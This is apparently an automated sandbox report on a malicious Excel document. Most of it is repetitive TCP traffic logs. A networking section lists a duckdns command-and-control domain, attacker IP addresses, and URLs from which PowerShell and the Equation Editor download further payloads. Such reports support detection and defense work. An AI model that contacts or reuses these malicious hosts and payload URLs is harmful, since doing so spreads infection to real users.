            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170

            Networking

            Source: Malware configuration extractor, URLs: sembe.duckdns.org
            Source: unknown, DNS query: name: sembe.duckdns.org
            Source: global traffic, TCP traffic: 192.168.2.22:49173 -> 194.187.251.115:14645
            Source: creatednewwaterbottleforme[1].gif.8.dr, Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
            Source: creatednewwaterbottleforme[1].gif.8.dr, Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
            Source: creatednewwaterbottleform.vBS.8.dr, Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
            Source: creatednewwaterbottleform.vBS.8.dr, Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
            Source: global traffic, HTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1 Host: 198.46.176.133 Connection: Keep-Alive
            Source: global traffic, HTTP traffic detected: GET /60/WDER.txt HTTP/1.1 Host: 192.3.176.174 Connection: Keep-Alive
            Source: global traffic, HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
            Source: Joe Sandbox View, IP Address: 188.114.97.3
            Source: Joe Sandbox View, IP Address: 188.114.96.3
            Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS
            Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
            Source: global traffic, HTTP traffic detected: GET /sA HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: tny.wtf Connection: Keep-Alive
            Source: global traffic, HTTP traffic detected: GET /60/gbh/creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback.doc HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.176.174 Connection: Keep-Alive
            Source: global traffic, HTTP traffic detected: GET /60/creatednewwaterbottleforme.gIF HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.176.174 Connection: Keep-Alive
            Source: unknown, TCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,12_2_0041B380
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D0FB8B4.emf
            Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /60/WDER.txt HTTP/1.1Host: 192.3.176.174Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: tny.wtf
            Source: global trafficDNS traffic detected: DNS query: sembe.duckdns.org
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:08:47 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jJElqVnUA8jKAx%2F3PmV0wFJdjDNyvn8deX5%2B0FMsEEFY2LgzOlpDDiWBEmqVoyPaex68lylLAgyk9nol7pY2Y03zAZpaFKvvz4cN800pE244OSTpBPUufyBF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a93ef0988077288-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:08:47 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J3zRELeiEaDmw4y51hpaSqR5HJUC7tJYsS6NiS8pIdb8C4VnJ%2BAFmlxrWEe4Ehzvc1hOVzJpro8aThAGNaDy1v1Jf1MuEDT6My%2FkHgsficCy1%2BHgs915%2Bj46"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a93ef0c5a7e7288-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:08:47 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h6f%2BYPJbcgtCcj7FAeR%2B3SmYzifSQgkg5DDsALOW850tHuATRAJEs04PCjkDMyoSDzzcFcXtlXs3y0gZ83gqmPazoOWQlVTepC7Hq1luWpTVG%2F6VaEILJLz5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a93ef0d5b577288-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:08:52 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=prf2EfDG%2FCvxWIKSDeHLWKkfPTRVsDRCuAyW86jiVQSWKfa%2B1kiG8tSJiY%2FSvWP3xgtqHIfqHeO7mMkS287lmAmNei3rpT18q%2FqWq1khLz%2BA%2BqJLrw1dVGQ1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a93ef29effcc354-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: powershell.exe, 0000000A.00000002.440512880.0000000008231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.174
            Source: powershell.exe, 0000000A.00000002.440512880.0000000008231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.174/60/WDER.txt
            Source: EQNEDT32.EXE, 00000008.00000002.423816080.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.174/60/creatednewwaterbottleforme.gIF
            Source: EQNEDT32.EXE, 00000008.00000002.423816080.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.174/60/creatednewwaterbottleforme.gIFj
            Source: powershell.exe, 0000000A.00000002.436996063.00000000023DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133
            Source: powershell.exe, 0000000A.00000002.436996063.00000000023DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.436404605.0000000000020000.00000004.00000020.00040000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg
            Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.1053847847.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: powershell.exe, 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
            Source: RegAsm.exe, 0000000C.00000002.1053847847.00000000004D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpC)
            Source: RegAsm.exe, 0000000C.00000002.1053847847.00000000004D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpQ)
            Source: powershell.exe, 0000000A.00000002.436709620.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.cxj
            Source: powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000A.00000002.436996063.00000000022A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: tny.wtf.url.4.drString found in binary or memory: http://tny.wtf/
            Source: AWD 490104998518.xls, sA.url.4.drString found in binary or memory: http://tny.wtf/sA
